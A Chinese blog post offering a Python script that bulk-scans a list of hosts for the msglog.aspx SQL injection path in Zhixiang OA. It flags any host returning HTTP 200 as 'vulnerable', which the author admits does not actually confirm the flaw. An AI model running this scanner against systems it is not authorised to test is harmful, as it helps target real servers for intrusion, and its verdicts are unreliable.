【批量检测】致翔OA-msglog-aspx-SQL注入漏洞
用python写了个poc,方便批量检测。原理就是检测出现漏洞的路径是否存在,并不能完全意义上的检测漏洞。需要自我甄别。
import requests
import sys
cunzailist = []
def title():
print('+------------------------------------------')
print('Version:致翔OA-msglog-aspx-SQL注入漏洞 ')
print('author:wanheiqiyihu ')
print('use:exploit.py url.txt ')
print('注意:在url.txt的最后一行打上换行符,不然会读取错误')
print('+------------------------------------------')
def Poc(url):
payload_test = '/mainpage/msglog.aspx?user=1'
print('正在扫描'+url)
while True:
try:
response_test = requests.get(url='http://' + url + payload_test,timeout=3)
content = response_test.status_code
if content == 200:
print("存在漏洞")
cunzailist.append(url)
break
else:
print('不存在漏洞')
break
except:
print('请求错误')
break
if __name__ == "__main__":
title()
filepath = sys.argv[1]
file_object = open(filepath,'r')
try:
while True:
line = file_object.readline()
if line:
print("line=", line)
liine = line[:-1]
Poc(url=liine)
else:
break
finally:
file_object.close()
for item in cunzailist:
print(item)
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。